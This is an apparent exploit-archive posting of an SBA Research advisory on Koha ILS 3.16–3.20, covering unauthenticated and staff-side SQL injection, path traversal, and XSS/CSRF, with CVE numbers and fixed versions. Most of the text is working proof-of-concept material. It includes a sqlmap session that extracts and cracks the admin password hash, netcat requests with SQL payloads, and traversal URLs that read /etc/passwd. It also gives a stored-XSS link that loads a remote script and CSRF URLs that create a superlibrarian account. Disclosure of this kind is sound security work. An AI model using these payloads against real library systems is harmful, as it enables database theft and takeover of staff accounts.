what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Koha ILS 3.20.x CSRF / XSS / Traversal / SQL Injection

Koha ILS 3.20.x CSRF / XSS / Traversal / SQL Injection
Posted Jun 26, 2015
Authored by Raschin Tavakoli

Koha ILS suffers from cross site request forgery, cross site scripting, remote SQL injection, and path traversal vulnerabilities. Versions 3.20.x less than or equal to 3.20.1, 3.18.x less than or equal to 3.18.8, and 3.16.x less than or equal to 3.16.12 are affected.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
advisories | CVE-2015-4631, CVE-2015-4632, CVE-2015-4633
SHA-256 | db2ddcd34b4c592559253b1b3c6f3e7e83b307e30c13455c3c11e7c181ea9384

Koha ILS 3.20.x CSRF / XSS / Traversal / SQL Injection

Change Mirror Download
===============================================================================================
SBA Research Vulnerability Disclosure 
===============================================================================================

title: Koha Unauthenticated SQL injection
product:         Koha ILS
affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
fixed version: 3.20.1, 3.17.8, 3.16.12
CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631
impact: critical
website:         http://www.koha-community.org/

found by:         Raschin Tavakoli / SBA Research Combinatorial Security Testing Group
contact:         cst@sba-research.org


References: http://koha-community.org/security-release-koha-3-20-1/
        http://koha-community.org/security-release-koha-3-18-8/
        http://koha-community.org/security-release-koha-3-16-12/


        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
        ​http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423

===============================================================================================

=========================
1. Mutiple SQL Injections
=========================

+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
+ a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633)   +
+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +

Vulnerability:
--------------
The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.

Impact:
-------
By injecting malicious sql code a remote attacker can access the database and read arbritary data. If the webserver is misconfigured, the file-system may be accessed as well.

References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412


# ################################################################################################## #
# PoC:     #
# ################################################################################################## #
1. Inspect Koha database schema

   Have a look at how to query the database for superlibrarian users:
   http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians

   So basically we we need to execute some SQL statement like this:
   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;

2. Query the database with sqlmap

   So let's fire up sqlmap with the --sql-shell parameter and input the query:

   root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4
         _
    ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150513}
   |_ -| . | |     | .'| . |
   |___|_  |_|_|_|_|__,|  _|
         |_|           |_|   http://sqlmap.org


   [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


   [*] starting at 09:20:07


   [09:20:07] [INFO] testing connection to the target URL
   sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
   ---
   Parameter: number (GET)
       Type: AND/OR time-based blind
       Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
       Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
   ---
   [09:20:09] [INFO] testing MySQL
   [09:20:09] [INFO] confirming MySQL
   [09:20:09] [INFO] the back-end DBMS is MySQL
   web server operating system: Linux Debian
   web application technology: Apache 2.4.10
   back-end DBMS: MySQL >= 5.0.0
   [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER


   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
   [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'
   [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
   [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                      
   [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
   admin
   [09:21:46] [INFO] retrieved: $2a$08$taQ
   [09:23:33] [ERROR] invalid character detected. retrying..
   [09:23:33] [WARNING] increasing time delay to 5 seconds 
   afOgEEhU
   [09:25:10] [ERROR] invalid character detected. retrying..
   [09:25:10] [WARNING] increasing time delay to 6 seconds 
   t/gW
   [09:26:13] [ERROR] invalid character detected. retrying..
   [09:26:13] [WARNING] increasing time delay to 7 seconds 
   TOmqnYe1Y6ZNxCENa
   [09:29:57] [ERROR] invalid character detected. retrying..
   [09:29:57] [WARNING] increasing time delay to 8 seconds 
   2.ONk2eZhnuEw5z9OjjxS
   [09:35:08] [ERROR] invalid character detected. retrying..
   [09:35:08] [WARNING] increasing time delay to 9 seconds 

   select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:    
   'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'

3. Feed john the ripper and be lucky

   root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass
   root@kali:/home/wicked# john ./admin-pass 
   Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
   admin            (?)
   guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate
   Use the "--show" option to display all of the cracked passwords reliably

   root@kali:/home/wicked# john ./admin-pass --show
   ?:admin

   1 password hash cracked, 0 left

4. Log in with username "admin" and password "admin" ;)

# ################################################################################################## #
# PoC End     #
# ################################################################################################## #

+ +++++++++++++++++++++++++++++++++++ +
+ b) SQL Injection in STAFF interface +
+ +++++++++++++++++++++++++++++++++++ +

Vulnerability:
--------------
An SQL Injection vulnerability exists in /cgi-bin/koha/reports/borrowers_out.pl allows remote attacker's to read arbritrary data via the database due to improper input validation of the parameters Filter and Criteria.

Impact:
-------
By injection malicious sql a remote attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426

# ################################################################################################## #
# PoC:     #
# ################################################################################################## #

====================================================================
1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil')
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002


echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002

====================================================================
2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002

====================================================================

You will notice different output in every second request, demonstrating the evaluation of the payload.

# ################################################################################################## #
# PoC End     #
# ################################################################################################## #

=================================
3. Path Traversal (CVE-2015-4633)
=================================

Vulnerability
-------------
The "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal.

Impact
------
A remote attacker my read arbitrary files on the system.

References
----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408


# ################################################################################################## #
# PoC:     #
# ################################################################################################## #

The following input is used to print out /etc/passwd:

/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

# ################################################################################################## #
# PoC End     #
# ################################################################################################## #

=================================
4. XSS and XSRF 
=================================

Vulnerability
-------------
Koha suffers from various critical XSS and XSRF vulnerabilities due to improper input validation. The site also lacks in the implementation of challenge tokens that prevent cross-site 
forgery (XSRF) attacks. 

The attack can be performed by:

- through a compromised user account. User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633)
- through a user clicking a malicious link (phishing mail, forum link etc.)

The following pages are affected from stored XSS flaws:

/cgi-bin/koha/opac-shelves.pl
/cgi-bin/koha/virtualshelves/shelves.pl

The following pages are affected from relfective XSS flaws:

/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display")
/cgi-bin/koha/opac-search.pl (parameters: "tag")
/cgi-bin/koha/authorities/authorities-home.pl (parameters: "value") 
/cgi-bin/koha/acqui/lateorders.pl (parameters: "delay")
/cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield")
/cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield")
/cgi-bin/koha/catalogue/search.pl (parameters: "limit")
/cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter") 
/cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode",
"suggesteddate_from", "suggesteddate_to")

Impact
----------
The vulnerabilites allow remote attackers to inject arbitrary web script or HTML in order to:

- escalate privileges by targeting staff members with XSRF 
- target users via browser exploits
- target the webserver by combining with other server-side vulnerabilities. 

References
----------------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418

# ################################################################################################## #
# PoC / Attack Scenario:     #
# ################################################################################################## #

Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:

--> http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0

Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens 

--> http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl

the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:

Create new user:
-----------------------

--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1

Give the new user superlibririan permission:
----------------------------------------------------------

--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian

The attacker can now log as superlibrarian.

Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link.
Alice needs to have access to the OPAC interface and to have permissions to create public lists.

# ################################################################################################## #
# PoC / Attack Scenario End     #
# ################################################################################################## #







Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close